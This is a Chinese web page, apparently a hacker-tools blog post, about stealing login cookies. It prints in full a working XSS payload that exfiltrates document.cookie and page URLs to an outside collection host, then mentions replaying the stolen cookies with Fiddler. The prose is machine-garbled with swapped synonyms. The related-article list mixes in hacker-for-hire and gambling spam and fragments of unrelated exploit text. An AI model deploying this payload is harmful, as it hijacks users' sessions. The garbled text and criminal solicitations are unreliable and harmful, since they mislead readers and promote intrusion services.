一些你不知道到Cookie安全登录防备

访客5年前黑客工具1334

作为一个web开发者,避免不了用户登录功用,但是有多少知道用户登录的一些安全防备技能呢?

 

一般的菜鸟只知道把用户信息保存到Cookie 即可,登录只管判别Cookie是否存在,凭借着cookie值的存在状况来判别用户是否登录,更有一些乃至把用户暗码也保存在Cookie中,这是极端风险的,人家要搞你分分钟能够模仿你的Cookie来登录你的用户,做一些风险的工作。

1、进犯者怎样拿到你的登录的Cookie值。

现在各种进犯技能,现在我只了解XSS进犯方式,就在前一段时间,我自己建立了一个自己的社区站点 在群里边评论遇到了一个大神,做过一个XSS进犯的测验,他在我的社区里边发布了一篇博客,里边嵌入了XSS进犯脚步,脚步代码如下:

(function(){(new Image()).src='http://xss.sssie.com/index.php?do=api&id=RQTPpx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://xss.sssie.com/index.php?do=keepsession&id=RQTPpx&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

这段代码,是经过第三方XSS渠道来的,不过现在有许多的免费XSS渠道,自己也能够建立一个。

经过嵌入以上脚步,只需用户登录了自己的帐号,一旦阅读了进犯者发布的博客,即进犯成功,XSS第三方渠道里边发送有关我登录的Cookie 给进犯者,这样你登录的Cookie值立马给盗取,是不是很风险呢?

2、进犯者模仿Cookie登录

做过后台开发的人都知道怎样模仿Cookie信息去登录,除非是菜鸟,这个我就不多说了,

不过不会后台开发的人,会运用一些东西,比方Fiddler 就很简单把Cookie信息模仿登录了,这儿就不逐个叙述完成进程了

[1] [2]  黑客接单网

相关文章

黑客武林,黑客是怎么找肉鸡的,如何找手机黑客

if (data[0] == 's') { $("#i_msg").val(''); $("#sendstatus").attr('class', 'text-success').text('Mess...

我以前网赌输很多钱睡不着现在全部补回来了信用卡

/etc/init.d/apache2 startSpring Cloud Config 1.4.0 to 1.4.5引述2017年4月23日Dan Tentler的推文,“并非所有主机都是Windo...

你还在赌博吗在上最近这几天我也输了多万

修复方案 根据相关数据源统计,目前,全球公共网络中有近300多万计算机开启了3389端口,即未改变端口的远程桌面服务(RDP),对于没有经过配置加固的内网更有大量机器开放相关端口服务。 因此,该漏洞既...

佛山黑客公司有接单的_找黑客ip地址工具下载-找黑客弄到学校月考试卷

「佛山黑客公司有接单的_找黑客ip地址工具下载-找黑客弄到学校月考试卷」衔接数据库:mysql、mssql、oracle、sqlite、postgresql、ODBC、PDO$at_id=$setco...

黑客接单攻击服务器,黑客怎么找的服务器的,哪里找黑客接单

SQL注入是一种歹意进犯,用户利用在表单字段输入SQL句子的方法来影响正常的SQL履行。 还有一种是经过system()或exec()指令注入的,它具有相同的SQL注入机制,但只针对shell指令。...

qq相册密码破解,怎么联系黑客,找黑客查看别人的微信记录吗

Level 8 → Level 9绕过姿态二:空白字符 value.二、查找看看有没有邮件系统,一般的邮件系统许多都是在内部,没有经过CDN的解析,这样经过检查原始的邮件头部,能够看到实...